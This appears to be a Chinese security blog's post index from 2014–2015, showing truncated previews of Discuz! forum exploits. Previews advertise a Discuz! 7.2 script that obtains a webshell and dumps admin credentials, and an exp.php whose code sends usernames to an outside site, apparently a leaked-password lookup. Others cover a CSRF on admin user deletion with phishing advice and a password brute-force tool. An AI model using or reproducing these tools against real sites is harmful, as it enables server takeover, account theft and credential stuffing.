admin 发布于 2015-01-15 12:59
0x00 漏洞概要
昨天360补天发了这样的一条微博:
然后打听了一下细节,发现居然是我13年7月报给TSRC的漏洞,看今天大家玩的挺开心,与TSRC的人聊了两句,说这个系列可以发几个了,所以我
也来凑个热闹,...
admin 发布于 2014-07-03 12:27
参数:
1.可直接getshell
2.爆管理账号密码
3.爆表前缀
如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。
DZ7.2.zip
<?php
/**
* @author: xiaoma
*...
admin 发布于 2014-06-09 02:43
之前写的几个后台拿shell,Discuz!忽略了,但新版本Discuz! X3.1 Release 20140301实际上有所加强,但是真的修复了之前提到的问题吗?
Discuz!大概做了下面几个改动:
1.统计代码处,对
2.首页文件名限制了".",有点时,返回【setting_functions_makehtml_indexname_inv...
admin 发布于 2014-06-04 09:00
以下代码保存为exp.php
<?php
class fuckdz{
public function sgk($user){
$a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto=");...
admin 发布于 2014-05-14 05:46
后台删除用户页面只是单纯做了submitcheck(‘submit’, 1),按之前的说明,程序这里没有判断formhash,也就是说可以用于CSRF
不过利用这个漏洞前提是要管理员登陆了后台,不过这个不会很麻烦吧(比如故意加点关键字进审核然后让管理员触发神马的,实在不行还能发帖钓鱼)
发帖插入 Discuz! 代码:
本帖...
admin 发布于 2014-05-13 19:39
公司的渗透测试主要面对的国内互联网企业,经常遇的到discuz,所以写个discuz的账号密码爆破工具,
说明:
1.支持discuz X1/1.5/2/2.5/3/3.1 等版本。
2.程序会自动判断编码。
...
